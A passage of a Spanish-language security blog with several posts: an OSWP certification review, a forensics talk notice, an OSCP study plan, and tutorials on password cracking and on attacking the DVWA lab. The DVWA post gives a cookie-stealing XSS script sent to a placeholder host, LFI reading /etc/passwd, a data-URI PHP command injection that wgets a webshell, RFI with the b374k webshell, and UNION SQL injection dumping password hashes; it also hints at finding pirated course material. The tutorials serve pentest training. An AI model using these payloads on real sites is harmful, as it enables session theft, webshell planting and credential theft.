Hey ayer llego al fín! el certificado despues de iniciar ese viaje aquel 8 de Febrero del presente año donde comenze a revisar información base que me permita conocer algo mas de esta tecnologia y al final luego de toda una serie de protocolos para que me acepten y pueda realizar el pago me habilitaron para rendir el examen en Agosto y recien el dia de ayer me llego la certificación oficialmente en casa, en esta entrada lo que hare es justamente el review de la certificación, como encarar la preparación para el examen pero antes de todo aquí esta por lo que luche. 


0x01 Compra de voucher

En mi caso fue un poco lioso la compra pero se que para algunos será mas fácil, ya que solo consta en solicitar en la página de Offensive el voucher por OSWP - WIFU y de ahi realizar la cancelación respectiva, no hay donde perderse.


0x02 Documentación recibida

Una vez realizas el pago te daran los enlaces respectivos para descargar el material audio visual y la imagen para virtualizar y probar, ojo que en este punto debes de tomar en cuenta contar con un Router y una tarjeta que entre en modo monitor.

0x03 Preparación

El punto de preparación viene por dos lados  primero por tu lado, totalmente personal y el segundo con el material de Offensive.

- Comprender la tecnologia 802.11, análisis de paquetes y demas. 
- Ver el material de Video (Se tiene lo necesario para rendir.)
- Realizar cada prueba del laboratorio que tenemos que ellos nos llevara a comprender cada uno de los ataques. 
- Paciencia las primeras 100 hojas o mas del material ya que es full teoria si no conoces o te falta conocimiento no esta demas seguir.
- Se consecuente y prepara  un calendario diario para aprovechar al maximo aun mas si te falta conocer algo recuerda estas pagando por algo que avale tus conocimientos, por lo tanto estudia y mejora con tus conocimientos. 

- Recuerda que hace bastante tiempo realize un post sobre material de refuerzo puedes tomarlo como referencia. Material de Apoyo OSWP

0X04 Tips para el Examen 

El dia del examen estuve re-nervioso esperando que llegue la hora, comentarles que ya en la prueba cometi un error de primerizo fue el de equivocarme el tipo de prueba a realizar para obtener la bandera, posterior a ello tuve que tranquilizarme y empezar de nuevo ya a partir de ello fue todo mas rápido un detalle del tiempo que me tomo, sumando mas o menos me tomo como 1 hora y 15 minutos.

Primer AP: 58 Minutos
Segundo AP: 15 Minutos
Tercer AP: 5 Minutos

- Descansa no comienzes el examen cansado que el cuerpo puede jugarte malas pasadas.
- Lee bien y atento las instrucciones que te mandan para el examen solo realiza la prueba  a los objetivos que te dan. 
- Tranquilidad y paciencia.
- Saca capturas de todo y genera un documento en bruto que necesitars para armar el infome que debes enviar en las proximas 24 horas que luego de 48 horas recibiras el correo si aprobaste  o no.

Y bueno si tienen alguna duda o cualquier detalle que no comente en esta entrada, pueden mandarme un correo a  sniferl4bs en gmail o bien por Telegram como SniferL4bs.

Como ya saben ando ahora en camino por el OSCP. Gracias Offensive Security por darme las ganas de seguir en este camino, y a mi querida @RizelTane que no dejo de confiar y apoyarme en todo y aqui el certificado.

Regards,
Snifer
 
Leer Mas
Nos acompañara un profesional que conoce el area Forense aunque en algunos putnos del planeta los llaman "Perito telemático" y no se que mas, pero bueno en este ITTALK o Forense Talk nos acompañara Lórien Doménech Ruiz @Loriendr , Perito Informático y Ceo en L.A. y Asociados (auditorías, tasaciones, peritajes y consultoría TIC).

info.Forense


Cuando donde? que temas veremos?

Primeros lo temas que se trataran son los siguientes.

1. ¿Qué es un Perito Informático Forense?
2. ¿Que se puede peritar?
3. La metodología
4. La profesión de Perito
5. Demos
a) Emails
b) Disco duro
c) Facebook
d) WhatsApp

La cita es el Viernes 11 de Diciembre 2016 a las 7:00PM (GMT-4)


Nos vemos en el ITTALK!!!

Regards,
Snifer
Leer Mas
 
Los ataques a las contraseñas generalmente son llevados a cabo por medio de fuerza bruta, algunas veces con diccionarios por defecto encontrados en el mismo kali como los que se encuentran en el directorio /usr/share/wordlist.


También podemos armar diccionarios semi custom con herramientas como por ejemplo crunch, que basta con pasarle la extensión del pass y los caracteres que deseamos para que nos arme unos monstruosos listados que pueden estar días probando.


En este ejemplo sólo le pedimos cuatro caracteres de extensión con 123 y abc, todas sus combinaciones posibles son 1296, imagínense lo que puede generar con todo el alfabeto, ocho caracteres de extensión y algún carácter especial.

Sin embargo, los ataques son más efectivos cuando el diccionario con el cual se atacará se customiza para ese target. Para ello, existen herramientas como cewl, a la cual se le pasa una url de la cual deseamos que obtenga string que nos pueden servir tanto para atacar passwords como para fuzzear en busca de directorios ocultos.

Esquema:
14- Passwords Attacks.
14.1 Online passwords attacks
14.2 Hash attacks
Online passwords attacks
Los ataques de fuerza bruta a servicios online como http, ssh, ftp, etc generalmente se llevan a cabo con herramientas como Hydra, Medusa y Ncrack. Veamos un poco el manejo de cada una de éstas herramientas presentes en Kali.

Hydra:


En el siguiente ejemplo le tiramos al servicio ssh que sabemos tiene el user root.


Hagan la prueba contra la máquina metasploitable que hemos usado hace unas entradas atrás intentando obtener las credenciales del usuario user por ejemplo.

Hash attacks

Para identificar de que tipo de hash se trata, tenemos la herramienta hash-identifier, para usarla solo tenemos que llamarla y pasarle el hash.



Y para identificar que es lo que oculta ese hash podemos utilizar John the ripper.




John the Ripper guarda las contraseñas crackeadas en ~/.john/john.pot. Para mostrar estas contraseñas ejecutamos el siguiente comando:
john --show hash

Para usar solamente el modo single (este modo ) ejecutamos:
john --single hash

Para usar solamente el modo incremental ejecutamos:
john --incremental hash

Para usar solamente el modo diccionarios ejecutamos:
john --wordlist=diccionario.lst --rules hash

Podría ocurrir que al ejecutar el comando john hash nos encontremos frente a este mensaje de error: “No password hashes loaded“ puede ser porque el diccionario con el que hemos intentado no tienen el la clave o porque ya han sido guardadas para lo que tenemos que usar
john --show hash.


Como siempre, cualquier duda o consulta, estamos por aquí.

Regards, @balderramaeric
Leer Mas

Hola a todos como saben hace un par de semanas comente que rendiria ahora el OSCP, toca ir a la universidad :), por lo cual estuve viendo algunas revisiones de personas que ya rendieron la certificacion viendo cada punto de vista que se necesita para contar con los conocimientos necesarios y rendir el examen, no quiero ni deseo llegar al examen para caer en el intento.

https://i2.wp.com/cdn.honestnetworker.com/wohcohghaequierainoi.gif
 
Y como leen el titulo tengo el objetivo de rendir el OSCP en los 30 dias que se tiene como mínimo para acceder a los laboratorios, el porque del tiempo es mas que todo un reto personal y en la siguiente serie de entradas que iran saliendo se presentara una posible guia para rendir la certificación ya sea en los 30 dias o el tiempo que vayan a tomar.
 
 
 
Primero lo primero lo que pide y exige la certificación es conocer bastante bien  el proceso de Pentesting seguir una metodologia, que engloba a ser consecuente en las tareas no realizar las cosas por realizar o irse de Reconocimiento directo a explotación.

Como sabemos en el area de seguridad es un constante ida y vuelta para estar de la mano de la tecnologia y mi talon de aquiles por decirlo así es el exploiting y escalamiento de privilegios sin el uso de metasploit, ya que sin el me quedo sin nada pro decirllo en el mambo, asi que toca crear y conocer como armar mi propio arsenal para escalamiento de privilegios aunque ultimamente estuve viendo y trabajando con PowerShell pero no siempre se tiene hechos fortuitos considerando todo ello a continuación listare el material que ando viendo para terminar hasta fin de año ya que mi objetivo es rendirlo por el mes de Mayo del 2016 pero antes de ello estar con los pies en la tierra y aprovechar al maximo los laboratorios. Mucha blah blah mejor comenzamos con la primera oleada de material de referencia. 

Documentación previa al OSCP

- INGLES!!! Para rendir el OSCP como cualquier certificación de OFFENSIVE debes de saber ingles ya que el contenido y el curso esta en ello, como tambien la generación de tu informe, por lo tanto si te falta o careces de conocimiento toca meterte a algun curso online o presencial.
 
- Para darte una idea de lo que es o bien tener un cheat por decirlo así puedes ver las entradas de @EricBalderrama el tipo rarito ese xD ya enserio el compañero que anda armando la serie de Pentesting con Kali en el cual nos da una vision bastante clara de lo que debemos conocer y que es lo que tendremos de frente. Para seguir las entradas acceder aquí.
 
 
- Para tener una base y cimientos fuertes sobre pentesting ademas de un primer acercamiento el libro de Georgia Weidman Penetration Testing en el cual se ve un capítulo de Exploit Development por lo tanto si gustan lo pueden comprar, este libro lo ando viendo por partes ya que algunos si conosco los dos primeros módulos por ejemplo.
 

No Startch: Penetration Testing
 
- Para la etapa de explotación de servidores, es necesario tener conocimiento sobre desarrollo de exploits esta area estoy medio perdido me falta aun mucho por recorrer por ello comenzare viendo los videos Megapremier de Security Tube, del mismo modo que me ayudaron  para el OSWP estoy seguro que me darán lo necesario para este lado. 
 
 
Otro libro que ire consultado posterior al de Pentesting y conjuntamente con los videos  sera el The Shellcoder's Handbook.



 
- Entornos vulnerables a la carta no deben de faltar para el entrenamiento entornos vulnerables que se puedan ir realizando el powned! y entrenando los conocimientos para ello les recomiendo Vulnhub que ahora ando con la idea de  dedicarme una por semana en romper o ver hasta donde llego, y en el caso de estancarme conforme pase el tiempo terminar de romperlo que por cierto ire posteando en lo posible dia Martes la entrada respectiva todo depende el tiempo que se me de.
 
https://blog.vulnhub.com/images/logo-tagline.png

- Ahora si le dan algo de Busqueda en la red podrán encontrar el material de PWK ya se los dejo a su ingenio ;).

- En las revisiones que fui viendo todos indican que debemos de conocer al menos algun lenguaje de Scripting, y por ello considerando que el lenguaje que mas o menos tengo un mejor manejo es Python ire armando los scripts necesarios para las diferentes etapas energizando y trabajando en GPT! creo que al final tuve ese empujon que necesitaba para meterle mano a GPT y darle una razón y sentido al desarrollo. Que por cierto ira cambiando lo que se tiene y demas detalles de a poco.
 
https://realpython.com/learn/python-first-steps/images/pythonlogo.jpg 
 
Proyecto GPT en GITHUB 
Gadget Pentesting Tool 

Cabe resaltar que esto es lo primero que ire viendo en el transcurso de los dias, ya posteriormente cuando note y vea un avanze mediático lo ire mostrando en el blog, como tambien actualizando algun libro que lo vea como referencia o identifique que brinda un buen apoyo espero sea de su agrado esta . 

Regards,
Snifer
Leer Mas
Los ataques a aplicaciones web han crecido tanto que al día de hoy es difícil encontrar una empresa que no tenga presencia en internet por medio de un sitio web. Sin contar que muchas veces delegan aplicaciones en ese mismo hosting como webmail, intranet, erp, entre otras tantas.

Es por esto que veremos la esencia de los ataques a las principales vulnerabilidades web, ya que posible tomar el control total del servidor aprovechándose de un error en el sql por ejemplo.

Es casi obligatorio, cuando hablamos de vulnerabilidades web, mencionar el top 10 de OWASP, para los que no lo conocen, es casi tarea ineludible adentrarse en el mundo de owasp.

Para los ejercicios que llevaremos a cabo en ésta entrada, en necesario que se bajen dvwa, ya que es el entorno al cual atacaremos y las explotaciones serán sencillas.

1- Inicializamos el servicio de apache

service apache2 start

2- Nos movemos al /var/www de descargamos un script que descarga e instala el dvwa

cd /var/www && wget url (www.m9development.com/wp-content/uploads/2015/03/install_dvwa.sh_.txt)


3- Modificamos nombre del archivo y los permisos del archivo

mv install_dvwa.sh_.txt dvwa.sh && chmod 755 dvwa.sh

4- Por último ejecutamos con ./NombreDelScript


Una vez que termine de correr el script se abrirá el browser que tengan por defecto con la url 127.0.0.1/login.php, para loguearse las credenciales son admin-password

Ahora vamos al browser, nos logueamos en el dvwa, vamos a DVWA Security y ponemos el lvl de seguridad en low.




Bien, ya tenemos armado y configurado el entorno que utilizaremos para las pruebas.

Esquema:
13- Web Applications Fundamentals Attacks.
13.1 XSS
13.2 File inclusion 
 13.3 SQLi
XSS

Los ataques a la vulnerabilidad de cross site scripting es consecuencia de de la no sanitización de los caracteres que se puede ingresar en un formulario web. Un ataque de éste tipo no afecta directamente el servidor, pero puede ser el medio para lograr impactos significativos sobre el mismo, al punto tal de obtener acceso a la sesión o redirigir e infectar a los usuarios que visiten el sitio comprometido.

Probemos entonces que sucede en un xss de tipo reflejado.


1- Vamos XSS reflected.


2- En el campo que nos permite ingresar nuestro ‘nombre’ colocamos el siguiente js
<script>alert(123)</script>



Ahora, quisiera que prueben la misma prueba de concepto sobre el stored y comenten las diferencias.

¿Qué pasa si en lugar del simple alert ingresamos un js un poco más complejo que obtenga las cookies y ponemos un handler o nc escuchando al puerto del webserver?

<script> new Image().src="http://IP/file.php?output="+document.cookie; </script>


File Inclusion

Los ataques de file inclusion pueden darse en dos variantes, de manera interna y externa, la diferencia entre ambos radica en que en el segundo (RFI) tenemos disponible la posibilidad de incluir archivos que estén alojados fuera del server comprometido y en el primero (LFI) sólo podemos hacer uso de los recursos internos.

Probemos un LFI, en el dvwa vamos a file inclusion y por url pasémosle un /etc/passwd 

 

Ya obtuvimos credenciales. ¿Que podríamos hacer con ellas? ¿Y si pasamos el siguiente parámetro por url?

   data:,<?php system($_GET[‘cmd’]); ?>&cmd=ls -l /var/www




 data:,<?php system($_GET[‘cmd’]); ?>&cmd=wget http://url/shell -O /var/www/shell.php




Para este ejemplo pasamos por url el siguiente parámetro.
data:,<?php system($_GET[‘cmd’]); ?>&cmd=wget http://127.0.01/shell.txt -O /var/www/shell.php



El remote file inclusion nos da la posibilidad de traer un archivo externo, frente a ésto, en lugar de llamar al /etc/passwd podemos llamar directamente a la shell que tengamos alojada en algun lado.

1- Vamos a File inclusion y analizamos que la url después del ? tiene un page=.




2- Descargamos una webshell, por ejemplo la b374k de github y la alojamos en nuestro /var/www guardada con la extensión .txt.


3- Ahora borramos el include.php y pasamos la url de nuestra shell, nos logueamos y estamos dentro.



SQLi

Esta vulnerabilidad consiste en inyectar código SQL invasor dentro del código SQL programado con el objetivo de alterar la funcionalidad del programa.


Podemos descubrirlas por url ingresando una comilla o una coma al final del parámetro.




Entonces veamos manualmente que es lo que podemos obtener. Tener en cuenta que si lo pasamos por url vamos a tener que poner ‘+’ en los espacios y los caracteres como ‘=’ o ‘,’ deben ir en hex.


1’ and 1=1 union select database(), user() #



1’ and 1=1 union select null, table_name from information_schema.tables#


De aquí lo que nos interesa es lograr identificar donde se guardan los usuarios y contraseñas.


Dumpeamos entonces users y pass
1’ and 1=1 union select user, password from users#




Solo queda deshashear los md5 de las pass y ya tenemos acceso.
En kali, tenemos una tool para automatizar esta tarea que se llama sqlmap
   ./sqlmap.py –u “Url del target.com/archivo.php?=parametro” --dbs
                                                                –u establece la url objetivo.
                                                             –dbs busca la db del target.

./sqlmap.py –u “Url del target.com/archivo.php?=parametro” –D ddbb --tables
                                                                  –D nombre de la db a analizar.
                                                               --tables  muestra las tablas de la db
Dumpeamos  el contenido de la tabla que deseamos.
./sqlmap.py –u “Url del target.com/archivo.php?=parametro” -D ddbb --tables -T tabla  --columns
                                                                 –T nombre de la tabla a analizar.
                                                                -- columns  muestra las columnas de las tablas escogidas.


Los ejemplos expuestos, son apenas una introducción sobre la técnica de explotación de vulnerabilidades web, además de que existen muchas otras. Sucede que para explicar detalladamente cada una llevaría mucho más que un solo post. Les recomiendo que miren las entradas de sniferl4bs sobre burp, en ellos están excelentemente explicadas las gran mayoría de las vulnerabilidades web, explotadas todas con una sola tool presente en kali linux.

Por ejemplo:

Como siempre, cualquier duda o consulta, estamos por aquí.


Leer Mas